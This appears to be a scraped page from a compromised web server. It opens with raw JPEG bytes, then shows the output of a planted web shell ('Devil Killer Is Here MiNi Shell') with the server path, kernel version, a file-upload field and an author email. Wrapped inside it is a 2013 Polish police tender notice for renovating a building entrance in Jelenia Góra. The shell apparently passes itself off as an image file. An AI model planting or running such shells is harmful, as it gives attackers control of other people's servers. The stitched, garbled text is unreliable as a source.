JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/302528-N-2013.html

<p class="kh_header"><b>Wrocław: Wykonanie robót budowlanych obejmujących remont strefy wejścia w Komendzie Miejskiej Policji w Jeleniej Górze, przy ul. Nowowiejskiej 43</b><br>
<b>Numer ogłoszenia: 302528 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji we Wrocławiu , ul Podwale 31-33, 50-040 Wrocław, woj. dolnośląskie, tel. (071) 340 38 00, faks (071) 782 41 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dolnoslaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych obejmujących remont strefy wejścia w Komendzie Miejskiej Policji w Jeleniej Górze, przy ul. Nowowiejskiej 43.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a) Przedmiotem zamówienia jest wykonanie robót budowlanych obejmujących remont strefy wejścia w Komendzie Miejskiej Policji w Jeleniej Górze, przy ul. Nowowiejskiej 43.
b) Zakres robót obejmuje niżej wskazane grupy:
I. ROBOTY ROZBIÓRKOWE:
Roboty wewnętrzne :
- rozbiórka ścianek działowych murowanych
- wykucie nowych otworów drzwiowych
- demontaż ścianek z GK
- demontaż stolarki drzwiowej
- rozbiórka podłóg z wykładzin pcv
- rozbiórka wykładzin ściennych i podłogowych ceramicznych
- demontaż urządzeń sanitarnych
- demontaż rur i grzejników
- demontaż osprzętu elektrycznego
II. ROBOTY OGÓLNOBUDOWLANE
- demontaż starych i montaż nowych drzwi drewnianych oklejanych
- montaż nowych ścianek aluminiowych z systemem kontroli dostępu
- przybicie na podłogach płyt OSB,
- ułożenie wykładziny PCV z wywinięciem na ściany na wys. 10 cm cokołów
- wykonanie nowych tynków wewnętrznych kat. III ścian,
- wykonanie gładzi gipsowych na ścianach i sufitach
- wykonanie licowania ścian sanitariatów okładziną z płytek ceramicznych matowych, 
- wykonanie malowania ścian farbą odporną na zmywanie w kolorach pastelowych, 
- wykonanie nowych posadzek płytek gresowych antypoślizgowych, 
- wykonanie izolacji przeciwwodnych w pomieszczeniach sanitariatów,
- montaż samozamykaczy,
- wykucie bruzd, zaprawianie, zamurowanie po wykonaniu instalacji,
- montaż podajników na papier toaletowy, podajników na mydło w  pomieszczeniach sanitariatów,
- montaż rolet materiałowych z materiałów niepalnych z atestem w kolorze z podstawowej palety barw do uzgodnienia z użytkownikiem, 
III. ROBOTY ELEKTRYCZNE:
- montaż instalacji gniazd wtyczkowych w pomieszczeniach w pomieszczeniach biurowych
- montaż instalacji oświetleniowej w pomieszczeniach biurowych
- montaż kompletnego osprzętu elektrycznego: gniazd wtykowych, łączników, opraw oświetleniowych,
- wykonanie kompletnej instalacji kontroli dostępu w nowych ściankach aluminiowych i drzwiach wejściowych na poszczególne kondygnacje
- wykonanie kompletnej sieci logicznej na parterze budynku
Po wykonaniu montażu wymienionych powyżej instalacji Wykonawca sporządzi badania i pomiary wszystkich zamontowanych instalacji zgodnie z obowiązującymi w tym zakresie przepisami.
IV. ROBOTY INSTALACYJNE SANITARNE:
W zakres robót instalacyjnych sanitarnych wchodzi wykonanie dwóch nowych węzłów sanitarnych, w tym jednego dla osób niepełnosprawnych oraz wymianę grzejników i podejść w remontowanych pomieszczeniach:
- montaż umywalek ceramicznych w tym jednej dla osób niepełnosprawnych,
- montaż baterii umywalkowych, natryskowych,
- montaż urządzeń sanitarnych wc w tym jednego dla osób niepełnosprawnych 
- wymiana wewnętrznej instalacji centralnego ogrzewania (rur oraz grzejników)
- wymiana rur wod.-kan.,

V. PRACE PORZĄDKOWE:
- wywóz gruzu z terenu budowy i uporządkowanie terenu, utylizacja i składowanie na wysypisku.

c) Przedmiot zamówienia określają :
- specyfikacje techniczne wykonania i odbioru robót stanowiące załączniki nr 2 do SIWZ
- przedmiar robót stanowiące załączniki nr 3 do SIWZ,
- dokumentacja fotograficzna i dodatkowe opisy stanowiące załączniki numer 4 do SIWZ,
Wykonawcy mogą dokonać wizji lokalnej na terenie placu budowy - KMP w Jeleniej Górze, ul. Nowowiejska 43. 
Termin należy wcześniej uzgodnić telefonicznie z pracownikiem  Wydziału Inwestycji i Remontów KWP we Wrocławiu - Panem Wiesławem Kanią, tel. 506 027 082..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień  uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.42.11.41-4, 45.41.00.00-4, 45.42.11.31-1, 45.44.21.00-8, 45.43.21.00-5, 45.43.10.00-7, 45.33.00.00-9, 45.31.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymaga się wniesienia wadium w wysokości: 9 700,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu w zakresie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający dokona oceny spełnienia tych warunków na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek posiadania wiedzy i doświadczenia za spełniony, w odniesieniu do Wykonawców, którzy w okresie 5 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli co najmniej 2 roboty budowlane, które swoim zakresem obejmowały roboty ogólnobudowlane oraz instalacyjne w zakresie instalacji sanitarnych oraz instalacji elektrycznych o wartości co najmniej  200 000,00 zł brutto każda robota.
Ocena spełniania warunków udziału w postępowaniu dotyczących posiadania wiedzy i doświadczenia dokonywana będzie na podstawie złożonego oświadczenia i dokumentów wskazanych w ogłoszeniu i SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu w zakresie warunku dysponowania odpowiednim potencjałem technicznym. Zamawiający dokona oceny spełnienia tych warunków na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony jeżeli Wykonawca wykaże, iż: dysponuje osobami, które posiadają uprawnienia budowlane do kierowania robotami budowlanymi w następujących specjalnościach: konstrukcyjno - budowlanej, instalacyjnej, w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych oraz instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 
Osoby, uczestniczące w wykonywaniu zamówienia - kierownicy we wskazanych wyżej  specjalnościach -  powinni posiadać aktualne dokumenty stwierdzające ich przynależność do odpowiedniej izby samorządu zawodowego wraz z aktualnym zaświadczeniem o obowiązkowym ubezpieczeniu od odpowiedzialności cywilnej z tytułu wykonywanego zawodu.
Zamawiający, w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2006 r., Nr 156, poz. 1118 ze zmianami) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394).

Dopuszcza się możliwość pełnienia więcej niż jednej funkcji przez jedną osobę, pod warunkiem łącznego spełnienia przez wskazaną osobę wyżej określonych wymagań.
Ocena spełniania warunków udziału w postępowaniu dotyczących dysponowania osobami zdolnymi do wykonania zamówienia dokonywana będzie na podstawie złożonego oświadczenia i dokumentów wskazanych w ogłoszeniu i SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonania oceny spełniania warunków udziału w postępowaniu w zakresie warunku sytuacji finansowej i ekonomicznej. Zamawiający dokona oceny spełnienia tych warunków na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia i dokumenty wymagane do załączenia w ofercie - niezbędne do przeprowadzenia postępowania.
- Wypełniony i podpisany formularz ofertowy - załącznik numer 1 do SIWZ
- Kosztorys ofertowy sporządzony na podstawie załączonego do SIWZ przedmiaru robót. 
- Dowód wniesienia wadium.
- Oświadczenia i dokumenty wymienione w Rozdziałach VI, VII, VIII SIWZ.
- W przypadku, gdy Wykonawca przewiduje udział podwykonawców w realizacji zamówienia: oświadczenie dotyczące udziału podwykonawców, którego wzór określa załącznik numer 12 do SIWZ.
1) W przypadku wnoszenia oferty przez wspólników spółki cywilnej należy załączyć dodatkowo: 
a) w przypadku, gdy oferta nie jest podpisana przez wszystkich wspólników - pełnomocnictwo wspólników do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy podpisane przez wszystkich wspólników lub ich prawnie upoważnionych przedstawicieli. Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. 
2) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum) 
a) Na podstawie art. 23 ust. 2 ustawy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
b) W związku z powyższym niezbędne jest przedłożenie w ofercie pełnomocnictwa ustanawiającego podmiot uprawniony (lidera) do występowania w imieniu konsorcjum, wraz z określeniem zakresu umocowania lidera  (pełnomocnictwo: do reprezentowania konsorcjum w prowadzonym postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy). Wymaga się, by pełnomocnictwo było podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów (konsorcjantów). Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. 
Zgodnie z art. 141 ustawy Pzp wykonawcy wspólnie ubiegający się o udzielenie zamówienia   ponoszą solidarną odpowiedzialność za wykonanie umowy. 
c) Każdy z partnerów musi złożyć oświadczenie, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 Pzp (załącznik numer 10 do SIWZ) oraz musi złożyć odnoszący się do niego dokument, wymieniony w rozdziale VII pkt 3). Wszystkie warunki udziału w postępowaniu, o których mowa w Rozdziale VII pkt 1 partnerzy winni spełniać łącznie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo zamówień publicznych nie dopuszcza się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wybory wykonawcy, chyba że Zamawiający przewidział możliwości dokonania zmiany, w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia. Zamawiający przewidział istotne zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy jeżeli zmiany te dotyczyć będą terminu wykonania przedmiotu zamówienia, w związku z wystąpieniem następujących okoliczności, niemożliwych do przewidzenia w chwili zawarcia umowy:
- przesunięcia terminów realizacji zadania w przypadku opóźnień wynikających z działania siły wyższej (np. klęski żywiołowej, strajku generalnego lub lokalnego) mającego bezpośredni wpływ na terminowość wykonywania robót, wystąpienia warunków atmosferycznych, archeologicznych, geologicznych, geodezyjnych, hydrologicznych uniemożliwiających wykonywanie robót budowlanych. Zmiana terminu realizacji przedmiotu umowy nie wpłynie na koszt realizacji zamówienia.
- regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy, wraz ze skutkami wprowadzenia takiej zmiany,
- oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy.
Wszelkie zmiany uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności, w postaci aneksu do umowy i muszą być akceptowane przez obie umawiające się strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dolnoslaska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji we Wrocławiu
Wydział Zamówień Publicznych i Funduszy Pomocowych
50-040 Wrocław, ul. Podwale 31-33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2013 godzina 10:00, miejsce: Komenda Wojewódzka Policji we Wrocławiu
Punkt Obsługi Klienta
50-040 Wrocław, ul. Podwale 31-33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com